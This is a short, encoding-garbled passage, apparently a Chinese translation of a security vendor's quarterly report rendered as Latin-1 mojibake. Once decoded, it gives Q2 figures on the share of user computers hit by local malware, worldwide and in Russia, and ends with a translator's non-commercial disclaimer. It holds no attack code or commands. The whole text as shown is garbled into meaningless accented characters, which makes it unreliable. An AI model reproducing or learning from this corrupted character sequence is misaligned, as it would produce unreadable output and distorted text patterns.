×ÜÌå¶øÑÔ£¬Q2È«ÇòÓÐ22.35%µÄÓû§ÍÆËã»úÔâµ½ÖÁÉÙÒ»´Î±¾µØ¶ñÒâÈí¼þÍþв¹¥»÷¡£

¶íÂÞ˹µÄÕâÒ»Êý×ÖÊÇ26.14%¡£

 

ÉêÃ÷£º±¾»ã±¨Ö»ÊÇΪÁ˽ø½¨×êÑжø·­Ò룬ÎÞ³ö°æ¡¢·¢ÊÛµÈÈκÎóÒ×ÐÐΪ£¬Òò¶ø²»ºÏÈκΰæÈ¨ÎÊÌâ³Ðµ£ÔðÈΡ£